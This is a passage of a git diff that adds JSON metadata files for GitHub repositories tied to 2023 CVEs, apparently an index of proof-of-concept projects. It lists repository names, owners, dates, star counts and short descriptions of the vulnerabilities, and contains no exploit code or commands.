+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42860.json b/2023/CVE-2023-42860.json
new file mode 100644
index 0000000000..941f50b0bc
--- /dev/null
+++ b/2023/CVE-2023-42860.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 784286642,
+ "name": "CVE-2023-42860",
+ "full_name": "Trigii\/CVE-2023-42860",
+ "owner": {
+ "login": "Trigii",
+ "id": 95245480,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95245480?v=4",
+ "html_url": "https:\/\/github.com\/Trigii"
+ },
+ "html_url": "https:\/\/github.com\/Trigii\/CVE-2023-42860",
+ "description": "Exploit for CVE-2023-42860",
+ "fork": false,
+ "created_at": "2024-04-09T14:53:46Z",
+ "updated_at": "2024-06-02T17:54:47Z",
+ "pushed_at": "2024-06-02T17:54:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apple",
+ "exploit",
+ "fda",
+ "macos",
+ "root",
+ "sip",
+ "tcc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-42931.json b/2023/CVE-2023-42931.json
new file mode 100644
index 0000000000..89c9c4bb55
--- /dev/null
+++ b/2023/CVE-2023-42931.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 777701876,
+ "name": "CVE-2023-42931",
+ "full_name": "d0rb\/CVE-2023-42931",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-42931",
+ "description": "The exploit targets a critical privilege escalation vulnerability in macOS versions Monterey, Ventura, and Sonoma.",
+ "fork": false,
+ "created_at": "2024-03-26T11:01:54Z",
+ "updated_at": "2024-05-07T07:01:13Z",
+ "pushed_at": "2024-03-26T17:16:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4294.json b/2023/CVE-2023-4294.json
new file mode 100644
index 0000000000..30eed3e118
--- /dev/null
+++ b/2023/CVE-2023-4294.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695816825,
+ "name": "CVE-2023-4294",
+ "full_name": "b0marek\/CVE-2023-4294",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4294",
+ "description": "Repository for CVE-2023-4294 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T10:16:03Z",
+ "updated_at": "2023-09-24T10:16:04Z",
+ "pushed_at": "2023-09-24T10:20:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43115.json b/2023/CVE-2023-43115.json
new file mode 100644
index 0000000000..d4184d7e70
--- /dev/null
+++ b/2023/CVE-2023-43115.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 697892944,
+ "name": "ghostscript-CVE-2023-43115",
+ "full_name": "jostaub\/ghostscript-CVE-2023-43115",
+ "owner": {
+ "login": "jostaub",
+ "id": 67969701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67969701?v=4",
+ "html_url": "https:\/\/github.com\/jostaub"
+ },
+ "html_url": "https:\/\/github.com\/jostaub\/ghostscript-CVE-2023-43115",
+ "description": "A small write-up with examples to understand CVE-2023-43115",
+ "fork": false,
+ "created_at": "2023-09-28T17:30:06Z",
+ "updated_at": "2024-04-09T19:00:53Z",
+ "pushed_at": "2023-12-26T15:37:47Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43144.json b/2023/CVE-2023-43144.json
new file mode 100644
index 0000000000..dac7939fe7
--- /dev/null
+++ b/2023/CVE-2023-43144.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 704649398,
+ "name": "CVE-2023-43144",
+ "full_name": "Pegasus0xx\/CVE-2023-43144",
+ "owner": {
+ "login": "Pegasus0xx",
+ "id": 122263374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122263374?v=4",
+ "html_url": "https:\/\/github.com\/Pegasus0xx"
+ },
+ "html_url": "https:\/\/github.com\/Pegasus0xx\/CVE-2023-43144",
+ "description": "Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php",
+ "fork": false,
+ "created_at": "2023-10-13T18:19:22Z",
+ "updated_at": "2023-10-13T18:19:22Z",
+ "pushed_at": "2023-10-13T18:20:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43147.json b/2023/CVE-2023-43147.json
new file mode 100644
index 0000000000..2b12c8f6bc
--- /dev/null
+++ b/2023/CVE-2023-43147.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 703710841,
+ "name": "CVE-2023-43147",
+ "full_name": "MinoTauro2020\/CVE-2023-43147",
+ "owner": {
+ "login": "MinoTauro2020",
+ "id": 65294596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4",
+ "html_url": "https:\/\/github.com\/MinoTauro2020"
+ },
+ "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43147",
+ "description": "CVE-2023-43148",
+ "fork": false,
+ "created_at": "2023-10-11T18:55:40Z",
+ "updated_at": "2023-10-12T16:03:28Z",
+ "pushed_at": "2023-10-12T16:22:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43148.json b/2023/CVE-2023-43148.json
new file mode 100644
index 0000000000..69b54f289f
--- /dev/null
+++ b/2023/CVE-2023-43148.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692410769,
+ "name": "CVE-2023-43148",
+ "full_name": "MinoTauro2020\/CVE-2023-43148",
+ "owner": {
+ "login": "MinoTauro2020",
+ "id": 65294596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4",
+ "html_url": "https:\/\/github.com\/MinoTauro2020"
+ },
+ "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43148",
+ "description": "CVE CSRF DELETE ACCOUNT",
+ "fork": false,
+ "created_at": "2023-09-16T11:48:44Z",
+ "updated_at": "2023-10-12T17:39:37Z",
+ "pushed_at": "2023-10-12T16:09:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43149.json b/2023/CVE-2023-43149.json
new file mode 100644
index 0000000000..ed89b76a47
--- /dev/null
+++ b/2023/CVE-2023-43149.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 704142072,
+ "name": "CVE-2023-43149",
+ "full_name": "MinoTauro2020\/CVE-2023-43149",
+ "owner": {
+ "login": "MinoTauro2020",
+ "id": 65294596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65294596?v=4",
+ "html_url": "https:\/\/github.com\/MinoTauro2020"
+ },
+ "html_url": "https:\/\/github.com\/MinoTauro2020\/CVE-2023-43149",
+ "description": "CVE-2023-43149",
+ "fork": false,
+ "created_at": "2023-10-12T16:11:39Z",
+ "updated_at": "2023-10-13T12:57:57Z",
+ "pushed_at": "2023-10-12T16:23:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43154.json b/2023/CVE-2023-43154.json
new file mode 100644
index 0000000000..7c213f8aa1
--- /dev/null
+++ b/2023/CVE-2023-43154.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 689157148,
+ "name": "CVE-2023-43154-PoC",
+ "full_name": "ally-petitt\/CVE-2023-43154-PoC",
+ "owner": {
+ "login": "ally-petitt",
+ "id": 76501220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4",
+ "html_url": "https:\/\/github.com\/ally-petitt"
+ },
+ "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-43154-PoC",
+ "description": "PoC for the type confusion vulnerability in Mac's CMS that results in authentication bypass and administrator account takeover.",
+ "fork": false,
+ "created_at": "2023-09-09T00:21:58Z",
+ "updated_at": "2023-09-22T23:23:27Z",
+ "pushed_at": "2023-09-22T23:25:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43177.json b/2023/CVE-2023-43177.json
new file mode 100644
index 0000000000..1cf7590953
--- /dev/null
+++ b/2023/CVE-2023-43177.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 736082515,
+ "name": "CVE-2023-43177",
+ "full_name": "the-emmons\/CVE-2023-43177",
+ "owner": {
+ "login": "the-emmons",
+ "id": 70683790,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70683790?v=4",
+ "html_url": "https:\/\/github.com\/the-emmons"
+ },
+ "html_url": "https:\/\/github.com\/the-emmons\/CVE-2023-43177",
+ "description": "CrushFTP <= 10.5.1 Remote Code Execution. Researchers: Ryan Emmons, Evan Malamis",
+ "fork": false,
+ "created_at": "2023-12-27T00:06:20Z",
+ "updated_at": "2024-06-24T20:44:05Z",
+ "pushed_at": "2024-06-14T17:44:09Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43208.json b/2023/CVE-2023-43208.json
new file mode 100644
index 0000000000..4d2ead6c1f
--- /dev/null
+++ b/2023/CVE-2023-43208.json
@@ -0,0 +1,106 @@
+[
+ {
+ "id": 772545059,
+ "name": "CVE-2023-43208-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2023-43208-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-43208-EXPLOIT",
+ "description": "A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2024-03-15T12:03:51Z",
+ "updated_at": "2024-06-15T16:30:10Z",
+ "pushed_at": "2024-03-16T21:22:27Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-43208",
+ "exploit",
+ "exploitation",
+ "exploits",
+ "hacking",
+ "mirth-connect",
+ "poc",
+ "proof-of-concept",
+ "rce",
+ "remote-code-execution",
+ "remote-code-execution-rce",
+ "vulnerabilities",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 773284524,
+ "name": "CVE-2023-43208-mirth-connect-rce-poc",
+ "full_name": "jakabakos\/CVE-2023-43208-mirth-connect-rce-poc",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-43208-mirth-connect-rce-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-17T08:44:14Z",
+ "updated_at": "2024-06-06T11:58:40Z",
+ "pushed_at": "2024-03-18T14:09:35Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812794551,
+ "name": "CVE-2023-43208-MIRTHCONNECT",
+ "full_name": "J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT",
+ "owner": {
+ "login": "J4F9S5D2Q7",
+ "id": 171471588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171471588?v=4",
+ "html_url": "https:\/\/github.com\/J4F9S5D2Q7"
+ },
+ "html_url": "https:\/\/github.com\/J4F9S5D2Q7\/CVE-2023-43208-MIRTHCONNECT",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-09T22:25:22Z",
+ "updated_at": "2024-06-09T22:34:38Z",
+ "pushed_at": "2024-06-09T22:33:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43261.json b/2023/CVE-2023-43261.json
new file mode 100644
index 0000000000..a8cbcd0d9f
--- /dev/null
+++ b/2023/CVE-2023-43261.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 697676686,
+ "name": "CVE-2023-43261",
+ "full_name": "win3zz\/CVE-2023-43261",
+ "owner": {
+ "login": "win3zz",
+ "id": 12781459,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12781459?v=4",
+ "html_url": "https:\/\/github.com\/win3zz"
+ },
+ "html_url": "https:\/\/github.com\/win3zz\/CVE-2023-43261",
+ "description": "CVE-2023-43261 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption",
+ "fork": false,
+ "created_at": "2023-09-28T08:45:55Z",
+ "updated_at": "2024-06-21T00:11:34Z",
+ "pushed_at": "2023-10-01T08:36:06Z",
+ "stargazers_count": 55,
+ "watchers_count": 55,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-43261"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 55,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43263.json b/2023/CVE-2023-43263.json
new file mode 100644
index 0000000000..25bc5a41b8
--- /dev/null
+++ b/2023/CVE-2023-43263.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 696679641,
+ "name": "CVE-2023-43263",
+ "full_name": "b0marek\/CVE-2023-43263",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-43263",
+ "description": "Repository for CVE-2023-43263 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-26T08:24:16Z",
+ "updated_at": "2023-09-28T13:56:26Z",
+ "pushed_at": "2023-10-10T07:17:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43284.json b/2023/CVE-2023-43284.json
new file mode 100644
index 0000000000..a4b72037d5
--- /dev/null
+++ b/2023/CVE-2023-43284.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 700363228,
+ "name": "CVE-2023-43284",
+ "full_name": "MateusTesser\/CVE-2023-43284",
+ "owner": {
+ "login": "MateusTesser",
+ "id": 45717435,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45717435?v=4",
+ "html_url": "https:\/\/github.com\/MateusTesser"
+ },
+ "html_url": "https:\/\/github.com\/MateusTesser\/CVE-2023-43284",
+ "description": "DLink DIR-846 Authenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-10-04T13:07:37Z",
+ "updated_at": "2024-05-16T03:37:47Z",
+ "pushed_at": "2023-10-04T13:31:59Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43317.json b/2023/CVE-2023-43317.json
new file mode 100644
index 0000000000..625d9741b3
--- /dev/null
+++ b/2023/CVE-2023-43317.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 747061917,
+ "name": "CVE-2023-43317",
+ "full_name": "amjadali-110\/CVE-2023-43317",
+ "owner": {
+ "login": "amjadali-110",
+ "id": 140477743,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140477743?v=4",
+ "html_url": "https:\/\/github.com\/amjadali-110"
+ },
+ "html_url": "https:\/\/github.com\/amjadali-110\/CVE-2023-43317",
+ "description": "Vertical Privilege Escalation via Session Storage by Amjad Ali (CVE-2023-43317)",
+ "fork": false,
+ "created_at": "2024-01-23T07:27:30Z",
+ "updated_at": "2024-01-23T07:27:31Z",
+ "pushed_at": "2024-01-24T13:24:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43318.json b/2023/CVE-2023-43318.json
new file mode 100644
index 0000000000..0fa8f37f50
--- /dev/null
+++ b/2023/CVE-2023-43318.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 765669255,
+ "name": "CVE-2023-43318",
+ "full_name": "str2ver\/CVE-2023-43318",
+ "owner": {
+ "login": "str2ver",
+ "id": 161814438,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161814438?v=4",
+ "html_url": "https:\/\/github.com\/str2ver"
+ },
+ "html_url": "https:\/\/github.com\/str2ver\/CVE-2023-43318",
+ "description": "JetStream Smart Switch - TL-SG2210P v5.0\/ Improper Access Control \/ CVE-2023-43318",
+ "fork": false,
+ "created_at": "2024-03-01T11:35:47Z",
+ "updated_at": "2024-03-01T11:35:47Z",
+ "pushed_at": "2024-03-01T11:53:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43323.json b/2023/CVE-2023-43323.json
new file mode 100644
index 0000000000..e0408ab64c
--- /dev/null
+++ b/2023/CVE-2023-43323.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692272876,
+ "name": "CVE-2023-43323",
+ "full_name": "ahrixia\/CVE-2023-43323",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43323",
+ "description": "mooSocial v3.1.8 is vulnerable to external service interaction on post function.",
+ "fork": false,
+ "created_at": "2023-09-16T01:28:58Z",
+ "updated_at": "2024-01-06T04:10:32Z",
+ "pushed_at": "2023-09-26T15:32:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43325.json b/2023/CVE-2023-43325.json
new file mode 100644
index 0000000000..c451eb56a0
--- /dev/null
+++ b/2023/CVE-2023-43325.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 692268843,
+ "name": "CVE-2023-43325",
+ "full_name": "ahrixia\/CVE-2023-43325",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43325",
+ "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on user login function.",
+ "fork": false,
+ "created_at": "2023-09-16T01:05:16Z",
+ "updated_at": "2024-01-06T09:07:00Z",
+ "pushed_at": "2023-09-29T14:53:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "xss"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43326.json b/2023/CVE-2023-43326.json
new file mode 100644
index 0000000000..46469c1173
--- /dev/null
+++ b/2023/CVE-2023-43326.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693444960,
+ "name": "CVE-2023-43326",
+ "full_name": "ahrixia\/CVE-2023-43326",
+ "owner": {
+ "login": "ahrixia",
+ "id": 35935843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4",
+ "html_url": "https:\/\/github.com\/ahrixia"
+ },
+ "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-43326",
+ "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Multiple URLs.",
+ "fork": false,
+ "created_at": "2023-09-19T03:38:25Z",
+ "updated_at": "2024-01-06T04:10:20Z",
+ "pushed_at": "2023-09-26T16:14:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43339.json b/2023/CVE-2023-43339.json
new file mode 100644
index 0000000000..43799ee915
--- /dev/null
+++ b/2023/CVE-2023-43339.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 692439285,
+ "name": "CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation",
+ "full_name": "sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43339-CMSmadesimple-Reflected-XSS---Installation",
+ "description": "CMSmadesimple 2.2.18 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.",
+ "fork": false,
+ "created_at": "2023-09-16T13:35:49Z",
+ "updated_at": "2023-09-25T21:41:42Z",
+ "pushed_at": "2023-09-18T06:55:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43340.json b/2023/CVE-2023-43340.json
new file mode 100644
index 0000000000..065d7afd45
--- /dev/null
+++ b/2023/CVE-2023-43340.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693008952,
+ "name": "-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options",
+ "full_name": "sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/-CVE-2023-43340-Evolution-Reflected-XSS---Installation-Admin-Options",
+ "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/options process.",
+ "fork": false,
+ "created_at": "2023-09-18T06:58:39Z",
+ "updated_at": "2023-09-28T22:32:26Z",
+ "pushed_at": "2023-09-21T12:10:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43341.json b/2023/CVE-2023-43341.json
new file mode 100644
index 0000000000..8a7ac5bfdc
--- /dev/null
+++ b/2023/CVE-2023-43341.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 693001684,
+ "name": "CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-",
+ "full_name": "sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-",
+ "owner": {
+ "login": "sromanhu",
+ "id": 87250597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4",
+ "html_url": "https:\/\/github.com\/sromanhu"
+ },
+ "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43341-Evolution-Reflected-XSS---Installation-Connection-",
+ "description": "Evolution CMS 3.2.3 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation\/connection process.",
+ "fork": false,
+ "created_at": "2023-09-18T06:39:38Z",
+ "updated_at": "2023-09-28T22:32:45Z",
+ "pushed_at": "2023-09-21T12:11:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-43342.json b/2023/CVE-2023-43342.json
new file mode 100644
index 0000000000..1d41c2a4cd
--- /dev/null
+++ b/2023/CVE-2023-43342.json
